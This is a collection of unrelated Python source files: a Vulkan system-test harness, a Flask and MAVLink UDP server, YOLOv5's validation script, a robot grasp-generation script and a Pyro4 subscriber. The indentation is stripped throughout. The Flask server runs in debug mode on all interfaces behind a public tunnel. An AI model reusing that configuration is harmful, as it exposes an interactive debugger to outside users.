def __init__(self, test_name):
super().__init__(test_name, "Android")
def run(self):
subprocess.run("adb shell am force-stop com.khronos.vulkan_samples")
subprocess.run(["adb", "shell", "am", "start", "-W", "-n", "com.khronos.vulkan_samples/com.khronos.vulkan_samples.SampleLauncherActivity", "-e", "test", "{0}".format(self.test_name)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
output = subprocess.check_output("adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1")
activity = "".join(output.decode("utf-8").split())
timeout_counter = 0
while activity == "vulkan_samples" and timeout_counter <= android_timeout:
sleep(check_step)
timeout_counter += check_step
output = subprocess.check_output("adb shell \"dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1\"")
activity = "".join(output.decode("utf-8").split())
if timeout_counter <= android_timeout:
subprocess.run(["adb", "pull", "/sdcard/Android/data/com.khronos.vulkan_samples/files/" + outputs_path + self.test_name + image_ext, os.path.join(root_path, outputs_path)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
return True
else:
print("\t\t\t(Error) Timed out")
return False
def create_app(platform, test_name):
"""
@brief Creates a buildable and runnable test, returning it
    @param platform A string naming the platform the app should be built for
@param test_name The name of the test, used to create the app
@return A runnable application
"""
if platform == "Windows":
return WindowsSubtest(test_name)
elif platform in ["Linux", "Darwin"]:
return UnixSubtest(test_name, platform)
elif platform == "Android":
return AndroidSubtest(test_name)
else:
print("Error: cannot create subtest, cant find associated platform.")
exit(1)
def get_command(command):
"""
@brief Ensures command can be executed on each platform
@param command The commands name
@return A platform appropriate command
"""
if platform.system() == "Windows":
command += ".exe"
return command
def get_resolution(image):
"""
@brief Gets the width and height of a given image
@param image The path to the image relative to this script
@return A string denoting the resolution in the format (WxH)
"""
return subprocess.check_output([get_command("magick"), "identify", "-format", "\"%[fx:w]x%[fx:h]\"", image]).decode("utf-8")[1:-1]
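# A small usage note: for a hypothetical 1280x720 screenshot,
# get_resolution("screenshot.png") returns the string "1280x720".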
def compare(metric, base_image, test_image, diff_image = "null:"):
"""
    @brief Compares two images using the given metric (changing the order of the image parameters will change the contents of diff_image)
@param metric The type of image comparison you want to invoke
@param base_image The relative path to the image to base the test on
@param test_image The relative path to compare the base_image with
@param diff_image The relative path to the output image of the difference between the two images, default "null:"
@return A float clamped between 0 and 1 denoting how similar the images are (1 being identical, 0 being opposite)
"""
output = ""
try:
output = subprocess.check_output([get_command("magick"), "compare", "-metric", metric, base_image, test_image, diff_image], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
pass
output = output.decode("utf-8")
return max(0.0, min(1.0 - float(output[output.find("(")+1:output.find(")")]), 1.0))
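# A minimal usage sketch of compare() (hypothetical paths): identical images
# yield 1.0, and a test passes when the similarity reaches the threshold above.
#
#   similarity = compare("MAE", "gold/shot.png", "tmp/shot.png")
#   passed = similarity >= threshold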
def test(test_name, screenshot_path):
"""
@brief Tests each screenshot within the tmp/ folder against the goldtest, saving the results if it fails
@param test_name The name of the test, used to retrieve the respective goldtest image
@param screenshot_path The directory where to store screenshots
@return True if the image tests pass
"""
# Run test
result = False
image = test_name + image_ext
base_image = screenshot_path + image
test_image = root_path + "assets/gold/{0}/{1}.png".format(test_name, get_resolution(base_image))
if not os.path.isfile(test_image):
print("\t\t\t(Error) Resolution not supported, gold image not found ({})".format(test_image))
return False
diff_image = "{0}{1}-diff.png".format(screenshot_path, image[0:image.find(".")])
print("\t\t\t(Comparing images...) '{0}' with '{1}':".format(base_image, test_image), end = " ", flush = True)
similarity = compare(comparison_metric, base_image, test_image, diff_image)
print("{}%".format(100*math.floor(similarity*10000)/10000))
    # Remove the images if they are similar enough to pass
if similarity >= threshold:
os.remove(base_image)
os.remove(diff_image)
result = True
return result
def execute(app):
print("\t=== Running {} on {} ===".format(app.test_name, app.platform))
if app.run():
app.test()
def main():
"""
@brief Runs the system test
"""
if test_android and not os.path.exists(tmp_path + "Android/"):
os.makedirs(tmp_path + "Android/")
if test_desktop and not os.path.exists(tmp_path + platform.system()):
os.makedirs(tmp_path + platform.system())
print("=== System Test started! ===")
results = []
# Create tests
apps = []
for test_name in sub_tests:
if test_android:
apps.append(create_app("Android", test_name))
if test_desktop:
apps.append(create_app(platform.system(), test_name))
# Run tests
if not multithread:
for app in apps:
if app:
execute(app)
else:
threads = []
for app in apps:
process = Thread(target=execute, args=[app])
process.start()
threads.append(process)
for thread in threads:
thread.join()
# Evaluate system test
passed = 0
failed = 0
for app in apps:
results.append(app.passed())
for result in results:
if result:
passed += 1
else:
failed += 1
if failed == 0:
print("=== Success: All tests passed! ===")
shutil.rmtree(tmp_path)
exit(0)
else:
print("=== Failed: {} passed - {} failed ===".format(passed, failed))
# If the screenshot directory is not empty, create an archive of the results
        if os.listdir(tmp_path):
print("=== Archiving results into '{}' ===".format(shutil.make_archive(archive_path + "system_test" + "-" + datetime.datetime.now().strftime("%Y.%m.%d-%H.%M.%S"), 'zip', tmp_path)))
shutil.rmtree(tmp_path)
exit(1)
if __name__ == "__main__":
argparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A simple script that runs, screenshots, and tests your apps against a pre-existing gold")
argparser.add_argument("-B", "--build", required=True, help="relative path to the cmake build directory")
argparser.add_argument("-C", "--config", required=True, help="build configuration to use")
argparser.add_argument("-S", "--subtests", default=os.listdir(os.path.join(script_path, "sub_tests")), nargs="+", help="if set the specified sub tests will be run instead")
argparser.add_argument("-P", "--parallel", action='store_true', help="flag to deploy tests in parallel")
build_group = argparser.add_mutually_exclusive_group()
build_group.add_argument("-D", "--desktop", action='store_false', help="flag to only deploy tests on desktop")
build_group.add_argument("-A", "--android", action='store_false', help="flag to only deploy tests on android")
args = vars(argparser.parse_args())
build_path = args["build"]
build_config = args["config"]
sub_tests = args["subtests"]
test_desktop = args["android"]
test_android = args["desktop"]
multithread = args["parallel"]
if build_path[-1] != "/":
build_path += "/"
# Ensure right dependencies are installed before continuing
runnable = True
for dependency in dependencies:
if shutil.which(dependency) is None:
print("Error: Couldn't find {}, perhaps it is not installed".format(dependency))
runnable = False
if not runnable:
if platform.system() not in ["Linux", "Darwin"]:
exit(1)
else:
print("Unix based system detected. Allowing script to continue to account for aliasing. Please ensure you have the dependencies installed or aliased otherwise the script will fail.")
# If building for android check that a valid device is plugged in
if test_android:
try:
subprocess.check_output("adb get-state")
except:
print("Device not found, disabling Android testing")
test_android = False
else:
print("Device found!")
if multithread:
print("Android doesn't support multithreading, disabling!")
multithread = False
# Run script and handle keyboard interruption
try:
main()
except KeyboardInterrupt:
print("System Test Aborted")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
serverLocal.py
|
from flask import Flask, render_template
from pymavlink import mavutil
from msgdef import *
import socket
import os
import threading
HOST = '127.0.0.1' #Server IP address
PORT = 65432 #Server port
firstTime = True #Indicates whether it's the first time server() is called
data_view = "" #Store data to view on webpage
bufferSize = 512
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/init')
def init():
    server()  # note: server() loops forever, so this request never completes
    return 'server stopped'
@app.route('/data')
def data():
return f"""<html><head><META HTTP-EQUIV="refresh"
CONTENT="1"></head><body>"""+ data_view +'</body></html>'
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
def server():
global data_view
global firstTime
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port
s.bind((HOST, PORT)) #Bind socket to port
sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data
if firstTime:
# Indicating the server has started
print("Server Started waiting for clients to connect ")
firstTime = False
receiveDataAndSendActuatorSignal(sensorConnection, s)
def receiveDataAndSendActuatorSignal(mavlink, sock):
    global data_view
    with sock:
        while True:
            try:
                data, addr = sock.recvfrom(bufferSize) #Receive a datagram and the client's address
            except:
                data = b''
            if len(data) != 0: #Checks if a UDP client is connected
                imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink
                if imu_msg is None:
                    continue #Restart loop if no data is received
                print(imu_msg)
                actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal
                encodedData = str(actuatorSignal).encode('utf-8') # Encode the signal
                sock.sendto(encodedData, addr) # Send the byte stream to the client
                data_view = f'''<p>Actuator Signal: {actuatorSignal}<br/> X Acceleration: {imu_msg.xacc}<br/>
                Y Acceleration: {imu_msg.yacc}<br/> Z Acceleration: {imu_msg.zacc}<br/>
                X Gyro: {imu_msg.xgyro}<br/> Y Gyro: {imu_msg.ygyro}<br/>
                Z Gyro: {imu_msg.zgyro}<br/></p>''' + data_view
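# A minimal client sketch for the protocol above (hypothetical, for
# illustration only): the client announces itself with any datagram, then
# receives the UTF-8 encoded actuator signal back from the server.
#
#   import socket as sk
#   client = sk.socket(sk.AF_INET, sk.SOCK_DGRAM)
#   client.sendto(b'hello', (HOST, PORT))  # announce the client address
#   signal = float(client.recvfrom(bufferSize)[0].decode('utf-8'))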
def url():
os.system('cmd /k "lt --port 5000"')
if __name__ == '__main__':
threading.Thread(target=url).start() #Start local tunnel
app.run(debug=True, host='0.0.0.0') #Build the Flask app
|
val.py
|
"""Validate a trained YOLOv5 model accuracy on a custom datasets
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_sync
from utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
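# Note on the gain above: torch.tensor(shape)[[1, 0, 1, 0]] picks out
# (width, height, width, height), so dividing an xywh box by it normalizes the
# coordinates to the 0-1 range that YOLO label files use.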
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
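# Shape note: with N detections and 10 IoU thresholds, process_batch returns an
# (N, 10) boolean tensor where correct[i, j] is True when detection i matched a
# same-class ground-truth box at IoU >= iouv[j].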
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
        single_cls=False,  # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
data = check_dataset(data) # check
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
    is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt')  # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t_ = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t = time_sync()
t0 += t - t_
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
t1 += time_sync() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t2 += time_sync() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.on_val_image_end(pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t2)) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.on_val_end()
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
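# A hedged sketch of invoking run() programmatically rather than via the CLI;
# the paths below are the repo's stock defaults, not a required layout:
#   results, maps, times = run(data='data/coco128.yaml', weights='yolov5s.pt',
#                              batch_size=16, half=False)
#   mp_, mr_, map50_, map_ = results[:4]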
def parse_opt():
parser = argparse.ArgumentParser(prog='val.py')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
opt.data = check_file(opt.data) # check file
return opt
def main(opt):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(requirements=FILE.parent / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
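# Typical CLI usage:
#   python val.py --data coco128.yaml --weights yolov5s.pt --img 640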
|
generate_grasp.py
|
import warnings
warnings.filterwarnings("ignore")
import operator
import argparse
import yaml
import numpy as np
import sys,os,glob,re,time,copy,trimesh,gzip
code_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append("{}/../".format(code_dir))
import pickle
from dexnet.grasping.gripper import RobotGripper
from dexnet.grasping.grasp_sampler import PointConeGraspSampler
import dexnet
from autolab_core import YamlConfig
import my_cpp
import multiprocessing as mp
import matplotlib.pyplot as plt
from Utils import *
from multiprocessing import Pool, Process, Manager
from functools import partial
from itertools import repeat
try:
    mp.set_start_method('spawn')
except RuntimeError:  # the start method can only be set once per process
    pass
from pybullet_env.env import Env
from pybullet_env.env_grasp import *
from pybullet_env.utils_pybullet import *
def compute_grasp_score_worker(grasps,ob_dir,gripper,id,d,debug):
if debug:
gui = True
else:
gui = False
env = EnvGrasp(gripper,gui=gui)
env.add_obj(ob_dir,concave=True)
p.changeDynamics(env.ob_id,-1,lateralFriction=0.7,spinningFriction=0.7,mass=0.1,collisionMargin=0.0001)
p.setGravity(0,0,-10)
for i_grasp in range(len(grasps)):
if i_grasp%max(1,(len(grasps)//100))==0:
print("compute_grasp_score_worker {}/{}".format(i_grasp,len(grasps)))
grasp_pose = grasps[i_grasp].get_grasp_pose_matrix()
grasps[i_grasp].perturbation_score = env.compute_perturbation_score(grasp_pose,trials=50)
del env
d[id] = grasps
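# Each worker hands its scored grasps back through the Manager dict 'd'
# (keyed by worker id); a plain module-level list would not be shared
# across the spawned processes.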
def generate_grasp_one_object_balanced_score_from_complete_grasp(obj_dir):
with gzip.open(obj_dir.replace('.obj','_complete_grasp.pkl'),'rb') as ff:
grasps = pickle.load(ff)
grasp_amount_per_bin = 1000
grasp_score_bins = cfg_grasp['classes']
n_grasp_score_bins = len(grasp_score_bins)-1
n_grasps_per_bin = np.zeros((n_grasp_score_bins),dtype=int)
grasp_bins = {}
for i_bin in range(0,n_grasp_score_bins):
grasp_bins[i_bin] = []
for grasp in grasps:
score = grasp.perturbation_score
score_bin = np.digitize(score,grasp_score_bins) - 1
grasp_bins[score_bin].append(grasp)
for i_bin in grasp_bins.keys():
grasp_bins[i_bin] = np.array(grasp_bins[i_bin])
grasp_bins[i_bin] = np.random.choice(grasp_bins[i_bin],size=min(grasp_amount_per_bin,len(grasp_bins[i_bin])),replace=False)
good_grasp = []
for i_bin,grasps in grasp_bins.items():
good_grasp += list(grasps)
print("#grasp={}".format(len(good_grasp)))
out_file = obj_dir.replace('.obj','_grasp_balanced_score.pkl')
with gzip.open(out_file, 'wb') as f:
pickle.dump(good_grasp, f)
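# For reference, np.digitize places each score into the bins defined by
# cfg_grasp['classes']; e.g. with hypothetical edges [0.0, 0.3, 0.6, 1.0],
# a perturbation score of 0.45 lands in bin 1:
#   np.digitize(0.45, [0.0, 0.3, 0.6, 1.0]) - 1  # -> 1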
def generate_grasp_one_object_complete_space(obj_dir):
ags = PointConeGraspSampler(gripper,cfg_grasp)
out_file = obj_dir.replace('.obj','_complete_grasp.pkl')
mesh = trimesh.load(obj_dir)
pts,face_ids = trimesh.sample.sample_surface_even(mesh,count=10000,radius=0.001)
normals = mesh.face_normals[face_ids]
pcd = toOpen3dCloud(pts,normals=normals)
max_xyz = pts.max(axis=0)
min_xyz = pts.min(axis=0)
diameter = np.linalg.norm(max_xyz-min_xyz)
pcd = pcd.voxel_down_sample(voxel_size=diameter/10.0)
points_for_sample = np.asarray(pcd.points).copy()
normals_for_sample = np.asarray(pcd.normals).copy()
    grasps = ags.sample_grasps(background_pts=np.ones((1,3))*99999,
                               points_for_sample=points_for_sample,
                               normals_for_sample=normals_for_sample,
                               num_grasps=np.inf, max_num_samples=np.inf,
                               n_sphere_dir=30, approach_step=0.005,
                               ee_in_grasp=np.eye(4), cam_in_world=np.eye(4),
                               upper=np.ones((7))*999, lower=-np.ones((7))*999,
                               open_gripper_collision_pts=np.ones((1,3))*999999,
                               center_ob_between_gripper=True, filter_ik=False,
                               filter_approach_dir_face_camera=False,
                               adjust_collision_pose=False)
# grasps = [ParallelJawPtGrasp3D(grasp_pose=np.eye(4))]*20
print(f'Evaluating #grasps={len(grasps)}')
if debug:
N_CPU = 1
else:
        N_CPU = mp.cpu_count()
grasps_split = np.array_split(grasps,N_CPU)
manager = mp.Manager()
d = manager.dict()
workers = []
for i in range(N_CPU):
p = mp.Process(target=compute_grasp_score_worker, args=(grasps_split[i],obj_dir,gripper,i,d,debug))
workers.append(p)
p.start()
grasps = []
for i in range(N_CPU):
workers[i].join()
grasps += list(d[i])
print(f"Saving #grasps={len(grasps)} to {out_file}")
with gzip.open(out_file, 'wb') as f:
pickle.dump(grasps, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--class_name',type=str,default='nut')
parser.add_argument('--debug',type=int,default=0)
args = parser.parse_args()
code_dir = os.path.dirname(os.path.realpath(__file__))
with open('{}/config.yml'.format(code_dir),'r') as ff:
cfg = yaml.safe_load(ff)
class_name = args.class_name
debug = args.debug
cfg_grasp = YamlConfig("{}/config_grasp.yml".format(code_dir))
gripper = RobotGripper.load(gripper_dir=cfg_grasp['gripper_dir'][class_name])
names = cfg['dataset'][class_name]['train']
obj_dirs = []
code_dir = os.path.dirname(os.path.realpath(__file__))
for name in names:
obj_dirs.append(f'{code_dir}/data/object_models/{name}')
print("obj_dirs:\n",'\n'.join(obj_dirs))
for obj_dir in obj_dirs:
print('obj_dir',obj_dir)
generate_grasp_one_object_complete_space(obj_dir)
generate_grasp_one_object_balanced_score_from_complete_grasp(obj_dir)
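# Example invocation (class names must exist under 'dataset' in config.yml):
#   python generate_grasp.py --class_name nut --debug 0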
|
manytopics_subscriber.py
|
"""
This is the subscriber for the 'many topics' messages example.
For code with more explanations, see the regular 'weather' message example code.
"""
from __future__ import print_function
import os
import time
import threading
import Pyro4
from operator import itemgetter
from messagebus.messagebus import Subscriber
Pyro4.config.AUTOPROXY = True
@Pyro4.expose
class Subber(Subscriber):
def init_counters(self, topics):
self.message_counter = {}
self.last_message = {}
for t in topics:
self.message_counter[t] = 0
self.last_message[t] = None
def consume_message(self, topic, message):
self.message_counter[topic] += 1
self.last_message[topic] = message
def clear_screen():
os.system(['clear', 'cls'][os.name == 'nt'])
subber = Subber()
d = Pyro4.Daemon()
d.register(subber)
daemon_thread = threading.Thread(target=d.requestLoop)
daemon_thread.daemon = True
daemon_thread.start()
# mass subscribe to all available topics
topics = sorted(subber.bus.topics())
subber.init_counters(topics)
for t in topics:
subber.bus.subscribe(t, subber)
